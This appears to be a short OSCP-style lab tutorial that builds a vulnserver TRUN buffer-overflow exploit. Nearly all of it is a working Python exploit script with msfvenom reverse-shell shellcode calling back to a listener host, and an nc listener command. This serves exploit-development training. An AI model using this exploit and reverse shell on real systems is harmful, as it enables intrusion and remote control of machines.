OSCP Security Technology - Modifying Shellcode

OSCP Security Technology - Modifying Shellcode

Generate a shellcode with msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 EXITFUNC=thread -f python -a x86 --platform windows -b "\x00" -v buf

OSCP Security Technology - Modifying Shellcode

buffer.py

#!/usr/bin/python

import socket
import os
import sys

host="192.168.2.34"
port=9999

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 EXITFUNC=thread -f python -a x86 --platform windows -b "\x00" -v buf
# 351 bytes

buf =  b""                                                                                             
buf += b"\xbb\xb0\xb5\x1b\xfb\xdb\xda\xd9\x74\x24\xf4\x5f\x29"                                         
buf += b"\xc9\xb1\x52\x83\xef\xfc\x31\x5f\x0e\x03\xef\xbb\xf9"                                         
buf += b"\x0e\xf3\x2c\x7f\xf0\x0b\xad\xe0\x78\xee\x9c\x20\x1e"                                         
buf += b"\x7b\x8e\x90\x54\x29\x23\x5a\x38\xd9\xb0\x2e\x95\xee"                                         
buf += b"\x71\x84\xc3\xc1\x82\xb5\x30\x40\x01\xc4\x64\xa2\x38"                                         
buf += b"\x07\x79\xa3\x7d\x7a\x70\xf1\xd6\xf0\x27\xe5\x53\x4c"                                         
buf += b"\xf4\x8e\x28\x40\x7c\x73\xf8\x63\xad\x22\x72\x3a\x6d"                                         
buf += b"\xc5\x57\x36\x24\xdd\xb4\x73\xfe\x56\x0e\x0f\x01\xbe"                                         
buf += b"\x5e\xf0\xae\xff\x6e\x03\xae\x38\x48\xfc\xc5\x30\xaa"                                         
buf += b"\x81\xdd\x87\xd0\x5d\x6b\x13\x72\x15\xcb\xff\x82\xfa"                                         
buf += b"\x8a\x74\x88\xb7\xd9\xd2\x8d\x46\x0d\x69\xa9\xc3\xb0"                                         
buf += b"\xbd\x3b\x97\x96\x19\x67\x43\xb6\x38\xcd\x22\xc7\x5a"                                         
buf += b"\xae\x9b\x6d\x11\x43\xcf\x1f\x78\x0c\x3c\x12\x82\xcc"                                         
buf += b"\x2a\x25\xf1\xfe\xf5\x9d\x9d\xb2\x7e\x38\x5a\xb4\x54"                                         
buf += b"\xfc\xf4\x4b\x57\xfd\xdd\x8f\x03\xad\x75\x39\x2c\x26"                                         
buf += b"\x85\xc6\xf9\xe9\xd5\x68\x52\x4a\x85\xc8\x02\x22\xcf"                                         
buf += b"\xc6\x7d\x52\xf0\x0c\x16\xf9\x0b\xc7\xd9\x56\x11\x0f"                                         
buf += b"\xb2\xa4\x15\x3e\x1e\x20\xf3\x2a\x8e\x64\xac\xc2\x37"                                         
buf += b"\x2d\x26\x72\xb7\xfb\x43\xb4\x33\x08\xb4\x7b\xb4\x65"                                         
buf += b"\xa6\xec\x34\x30\x94\xbb\x4b\xee\xb0\x20\xd9\x75\x40"                                         
buf += b"\x2e\xc2\x21\x17\x67\x34\x38\xfd\x95\x6f\x92\xe3\x67"                                         
buf += b"\xe9\xdd\xa7\xb3\xca\xe0\x26\x31\x76\xc7\x38\x8f\x77"                                         
buf += b"\x43\x6c\x5f\x2e\x1d\xda\x19\x98\xef\xb4\xf3\x77\xa6"                                         
buf += b"\x50\x85\xbb\x79\x26\x8a\x91\x0f\xc6\x3b\x4c\x56\xf9"                                         
buf += b"\xf4\x18\x5e\x82\xe8\xb8\xa1\x59\xa9\xd9\x43\x4b\xc4"                                         
buf += b"\x71\xda\x1e\x65\x1c\xdd\xf5\xaa\x19\x5e\xff\x52\xde"                                         
buf += b"\x7e\x8a\x57\x9a\x38\x67\x2a\xb3\xac\x87\x99\xb4\xe4" 

# 77A373CD   FFE4             JMP ESP

buffer = "TRUN /.:/" + "A" * 2003 + "\xcd\x73\xa3\x77" + "\x90" * 16 +  buf + "C" * (5060 - 2003 - 4 - 16 - len(buf))

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(buffer)
expl.close()

Run the script.

OSCP Security Technology - Modifying Shellcode

OSCP Security Technology - Modifying Shellcode

Modify the script. ("\xaf\x11\x50\x62")

#!/usr/bin/python

import socket
import os
import sys

host="192.168.2.34"
port=9999

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 EXITFUNC=thread -f python -a x86 --platform windows -b "\x00" -v buf
# 351 bytes

buf =  b""                                                                                             
buf += b"\xbb\xb0\xb5\x1b\xfb\xdb\xda\xd9\x74\x24\xf4\x5f\x29"                                         
buf += b"\xc9\xb1\x52\x83\xef\xfc\x31\x5f\x0e\x03\xef\xbb\xf9"                                         
buf += b"\x0e\xf3\x2c\x7f\xf0\x0b\xad\xe0\x78\xee\x9c\x20\x1e"                                         
buf += b"\x7b\x8e\x90\x54\x29\x23\x5a\x38\xd9\xb0\x2e\x95\xee"                                         
buf += b"\x71\x84\xc3\xc1\x82\xb5\x30\x40\x01\xc4\x64\xa2\x38"                                         
buf += b"\x07\x79\xa3\x7d\x7a\x70\xf1\xd6\xf0\x27\xe5\x53\x4c"                                         
buf += b"\xf4\x8e\x28\x40\x7c\x73\xf8\x63\xad\x22\x72\x3a\x6d"                                         
buf += b"\xc5\x57\x36\x24\xdd\xb4\x73\xfe\x56\x0e\x0f\x01\xbe"                                         
buf += b"\x5e\xf0\xae\xff\x6e\x03\xae\x38\x48\xfc\xc5\x30\xaa"                                         
buf += b"\x81\xdd\x87\xd0\x5d\x6b\x13\x72\x15\xcb\xff\x82\xfa"                                         
buf += b"\x8a\x74\x88\xb7\xd9\xd2\x8d\x46\x0d\x69\xa9\xc3\xb0"                                         
buf += b"\xbd\x3b\x97\x96\x19\x67\x43\xb6\x38\xcd\x22\xc7\x5a"                                         
buf += b"\xae\x9b\x6d\x11\x43\xcf\x1f\x78\x0c\x3c\x12\x82\xcc"                                         
buf += b"\x2a\x25\xf1\xfe\xf5\x9d\x9d\xb2\x7e\x38\x5a\xb4\x54"                                         
buf += b"\xfc\xf4\x4b\x57\xfd\xdd\x8f\x03\xad\x75\x39\x2c\x26"                                         
buf += b"\x85\xc6\xf9\xe9\xd5\x68\x52\x4a\x85\xc8\x02\x22\xcf"                                         
buf += b"\xc6\x7d\x52\xf0\x0c\x16\xf9\x0b\xc7\xd9\x56\x11\x0f"                                         
buf += b"\xb2\xa4\x15\x3e\x1e\x20\xf3\x2a\x8e\x64\xac\xc2\x37"                                         
buf += b"\x2d\x26\x72\xb7\xfb\x43\xb4\x33\x08\xb4\x7b\xb4\x65"                                         
buf += b"\xa6\xec\x34\x30\x94\xbb\x4b\xee\xb0\x20\xd9\x75\x40"                                         
buf += b"\x2e\xc2\x21\x17\x67\x34\x38\xfd\x95\x6f\x92\xe3\x67"                                         
buf += b"\xe9\xdd\xa7\xb3\xca\xe0\x26\x31\x76\xc7\x38\x8f\x77"                                         
buf += b"\x43\x6c\x5f\x2e\x1d\xda\x19\x98\xef\xb4\xf3\x77\xa6"                                         
buf += b"\x50\x85\xbb\x79\x26\x8a\x91\x0f\xc6\x3b\x4c\x56\xf9"                                         
buf += b"\xf4\x18\x5e\x82\xe8\xb8\xa1\x59\xa9\xd9\x43\x4b\xc4"                                         
buf += b"\x71\xda\x1e\x65\x1c\xdd\xf5\xaa\x19\x5e\xff\x52\xde"                                         
buf += b"\x7e\x8a\x57\x9a\x38\x67\x2a\xb3\xac\x87\x99\xb4\xe4" 

# 77A373CD   FFE4             JMP ESP

buffer = "TRUN /.:/" + "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 16 +  buf + "C" * (5060 - 2003 - 4 - 16 - len(buf))

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(buffer)
expl.close()
nc -nvlp 4444

OSCP Security Technology - Modifying Shellcode

OSCP Security Technology - Modifying Shellcode

Refer to:

http://sh3llc0d3r.com/vulnserver-trun-command-buffer-overflow-exploit/

OSCP Security Technology - Modifying Shellcode

上一篇:CF266D BerDonalds(图的绝对中心)


下一篇:nginx之rewrite功能